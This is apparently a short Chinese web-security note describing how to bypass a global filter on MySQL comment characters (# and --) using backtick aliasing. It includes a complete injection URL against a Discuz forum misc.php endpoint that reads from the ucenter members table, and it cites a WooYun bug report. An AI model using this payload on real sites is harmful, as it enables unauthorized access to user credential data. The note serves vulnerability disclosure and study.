Quan

WEB安全

MYSQL注入绕过注释符限制

很多时候可能会出现这样一个问题，对方的代码存在全局过滤# --(也就是防止你注释) 但在MYSQL中有一个别名特性，他会自动闭合另外一个反引号，因此可以这样用：
http://localhost/bbs/misc.php?mod=stat&op=trend&xml=1&merge=1&types[1]=password`as statistic from pre_common_statuser,pre_ucenter_members as
P牛在绕过DZ的全局SQL防注入的时候就使用了这个操作。

https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2014-074970